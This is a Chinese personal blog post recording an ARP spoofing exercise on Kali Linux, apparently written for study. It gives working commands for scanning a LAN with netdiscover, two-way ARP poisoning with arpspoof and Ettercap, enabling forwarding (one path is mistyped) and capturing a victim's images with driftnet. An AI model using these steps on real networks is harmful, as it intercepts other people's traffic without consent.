kali进行arp嗅骗和攻击的一次记录

由于本人打算考网络安全的专硕,所以这几天玩了一次kali。恩,怎么说呢,感触挺深的,特此记录下来

arp基础

在我们进行各种高大上的讲解的时候,我们要先清楚一点,我们如何在网上进行各种活动的。
比如我们经常用的baidu,我们是如何访问到baidu的服务器的。

我们可以通过追踪路由来弄清楚这个问题

windows: tracert
linux:traceroute

通过运行上面的命令我们可以看出数据包的传输过程

由于本人身处深山,所以网络查的可以,上面的图仅供参考

我们可以看到,我们的探测数据包经过了很多路由的转发最终达到了我们的机器上

并且,这里我们需要引出很重要的东西 -- 网关

网关我们可以这么理解:
相信大家家里都有有线网了吧,我们其实可以把网关看成我们的那个接入网络的光猫路由器。

我们所有的数据包都是通过网关这个小东西传输。

现在,重点来了!!!!

敲黑板

假如,我们在同一个局域网下面,有两台机器,一台是我们自己,一台是需要攻击的机器。

那么,正常情况下,两台机器都有自己的ip地址 (192.168.x.x),进行自己正常的网络服务,但是如果我们告诉对方机器现在我就是路由器,而且如果我的机器不能进行端口转发的时候,对面的机器就进不去网了。

需要注意的一点哈,现在我们告诉了对方机器我们是路由器,但是路由器还是可以给对面机器通信的。

这一点可以重复上面的操作,就是告诉路由器我们就是对面机器,进行双向嗅探来解决。

如何进行攻击

命令行方法

一、 获取对方信息

由于这篇博客写的是内网渗透,所以,我们需要扫描当前网络下的其他机器

  > ifconfig

先查看一下自己ip 里面重要的消息 有网卡和ip

这里说明一点,一般的话网关的最后一位数字一般都是1

  > netdiscover -i [网卡] -r [网关/24]
  example:
  > netdiscover -i eth0 -r 192.168.3.1/24

这样就可以获取对方ip,这里我只有一台电脑,我就不放图了

二、开始进行嗅探

arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

> arpspoof -i eth0 [对方ip]  网关


双向嗅探

  > arpspoof -i eth0 [对方ip]  网关
  > arpspoof -i eth0 [网关]  对方ip

由于kali默认情况下是禁止端口转发的,所以现在的情况下对面机器是断网的

开启端口转发

  echo 1> /proc/sys/net/ipv4/ipforward

1是开启 0是关闭

proc是目前开机的时候机器的配置,重启的话会重置

抓取对面图片

  driftnet -i eth0

软件嗅探

具体做法

sniff->unified sniffing

host -> hostlist

host -> scan for host

网关IP add to target 1 靶机 add to target 2

Mitm->ARP poisoning

要记住选中第一项 第二项是单项ARP毒缓存 用于靶机会失败报警 单向欺骗网关

开启driftnet

原文地址:https://www.cnblogs.com/adroitwolf/p/14309988.html